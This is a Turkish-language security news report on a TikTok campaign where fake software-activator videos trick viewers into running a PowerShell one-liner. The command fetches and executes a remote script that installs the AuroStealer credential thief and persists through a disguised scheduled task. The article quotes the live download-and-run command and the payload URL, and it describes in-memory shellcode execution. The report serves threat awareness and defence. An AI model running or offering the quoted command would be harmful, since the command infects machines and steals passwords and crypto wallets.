Saldırganlar, görünüşte zararsız videolar aracılığıyla kullanıcıları kötü amaçlı yazılım çalıştırmaları için kandırmak amacıyla TikTok’un geniş erişiminden yararlanıyor.
Popüler bir TikTok videosunda (500’den fazla beğenilen) saldırgan, ücretsiz bir Photoshop etkinleştirme aracı sağlayıcısı gibi davranıyor ve izleyicileri PowerShell’i yönetici olarak açıp çalıştırmaya çağırıyor:
powershelliex (irm slmgr.win/photoshop)
Bu komut şunu kullanır: Invoke-Expression (iex) tarafından getirilen bir betiği çalıştırmak için Invoke-RestMethod (irm) kötü niyetli bir ana bilgisayardan.
Güvenlik araştırmacıları, tehdit aktörlerinin TikTok kliplerinde Photoshop etkinleştiricileri gibi davrandıkları ve kurbanları, kötü amaçlı kodları çekip çalıştıran PowerShell tek satırlık uygulamaları çalıştırmaya yönlendirdikleri bir kampanyayı ortaya çıkardı.
Bu teknik, ClickFix sosyal mühendislik senaryosunu yansıtıyor; burada kullanıcılar benzer şekilde Microsoft bloglarına tıklayıp kodları çalıştırarak kandırılıyor ve onları kötü amaçlı yazılım yüklemesine maruz bırakıyor.
Sağlanan bağlantıyı ziyaret ettiklerinde kurbanlar, şu anda 17/63 VirusTotal tespit oranını kaydeden ve göreceli yenilik ve kaçınma yeteneklerini vurgulayan bir PowerShell verisi (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23) alıyor.
İlk komut dosyası çalıştırıldığında, şu kişiye ulaşır: https://file-epq.pages.dev/updater.exe Updater.exe (SHA256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8) adlı bir sonraki aşamayı indirmek için.
Analizler, bu ikilinin, kayıtlı tarayıcı şifrelerini ve kripto para birimi cüzdanlarını sızdırmasıyla bilinen, kimlik bilgisi toplayan bir truva atı olan AuroStealer olduğunu ortaya koyuyor.
Kalıcılığı korumak için PowerShell betiği meşru güncelleme görevleri listesinden rastgele bir görev adı seçer (örn. AdobeUpdateTask, WindowsUpdateCheck).
Daha sonra PowerShell’i gizli pencere stiliyle başlatan ve yürütme politikasını atlayan zamanlanmış bir görev oluşturur ve Updater.exe’nin kullanıcı oturum açtığında şüphe yaratmadan çalışmasını sağlar.
Meşru görev adlarının kullanılması, kötü niyetli kalıcılığın normal sistem davranışına karışmasına ve tespitten kaçmasına yardımcı olur.
Anında Derleme ve Bellekte Yürütme
AuroStealer aşamasını takiben, adı verilen başka bir yük source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) alınır ve başlatılır.
Bu ikili, gelişmiş bir kendi kendini derleyen kötü amaçlı yazılım tekniğini kullanır: yürütme sırasında .NET derleyicisini çağırır. csc.exe geçici olarak saklanan kaynak kodunu derlemek için .cmdline dosya.
Derlenen sınıf P/Invoke bildirimlerini içerir. VirtualAlloc, CreateThreadVe WaitForSingleObjectbellek ayırmasına, kabuk kodunu doğrudan sürece enjekte etmesine, yürütülmek üzere bir iş parçacığı oluşturmasına ve süresiz olarak beklemesine olanak tanıyarak diske dokunmadan tamamen bellek içi yük yürütmesine olanak tanır.
Bu tür isteğe bağlı derleme, son kötü amaçlı kod yalnızca geçici bellekte mevcut olduğundan, statik analiz ve algılamayı karmaşık hale getirir.
Araştırmacılar, saldırganların erişim alanlarını genişletmek için sosyal mühendislik temalarını yinelediklerini gösteren, “Office’i Etkinleştir” veya “Windows’un Kilidini Aç” gibi farklı yazılım tuzakları kullanan aynı kampanyadan ek TikTok videoları belirlediler:
- hxxps://vm.tok.com/ZGdaC7EQY/
- hxxps://vm.com.com/ZGdaX8jVq/
Bu kampanya, PowerShell aracılığıyla kendi kendini derleyen, bellek içi kötü amaçlı yazılımlar sunmak için artık kısa biçimli video platformlarından yararlanan siber suçluların gelişen taktiklerinin altını çiziyor.
Kullanıcılar hiçbir zaman doğrulanmamış kaynaklardan terminal komutları çalıştırmamalı ve platformlar, talimatlar potansiyel olarak tehlikeli işlemleri teşvik ettiğinde izleyicileri uyarmayı düşünmelidir.
Saldırganlar yeni dağıtım kanallarını ve anti-analiz tekniklerini birleştirerek ısrarla yenilik yaptıkça, güvenlik farkındalığı ve güçlü uç nokta savunmaları, ortaya çıkan bu tehditlere karşı en iyi savunma hattı olmaya devam ediyor.
Anında Güncellemeler Almak ve GBH’yi Google’da Tercih Edilen Kaynak Olarak Ayarlamak için bizi Google Haberler, LinkedIn ve X’te takip edin.